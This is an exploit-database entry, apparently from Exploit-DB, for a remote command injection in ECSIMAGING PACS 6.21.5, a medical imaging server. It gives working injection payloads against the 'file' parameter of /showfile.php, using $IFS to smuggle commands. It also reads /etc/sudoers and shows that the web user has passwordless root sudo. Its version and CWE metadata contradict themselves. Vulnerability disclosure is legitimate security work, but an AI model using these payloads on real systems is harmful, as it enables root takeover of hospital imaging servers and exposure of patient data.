ECSIMAGING PACS 6.21.5 - Remote code execution

vendor:

PACS

by:

shoxxdj

9.8

CVSS

HIGH

OS Injection

CWE

Product Name: PACS

Affected Version From: 6.21.5

Affected Version To: 6.21.3

Patch Exists: YES

Related CWE: CVE-2021-25892

CPE: a:ecsimaging:ecsimaging_pacs

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2021

ECSIMAGING PACS 6.21.5 – Remote code execution

ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter 'file' on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access. Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in system commands.

Source

Exploit-DB raw data:

# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux

ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability.
The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access.
www-data user has sudo NOPASSWD access :

/showfile.php?file=/etc/sudoers
[...]
www-data ALL=NOPASSWD: ALL
[...]

Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/

/showfile.php?file=;sudo$IFS-l
[...]
User www-data may run the following commands on this host:
(root) NOPASSWD: ALL
[...]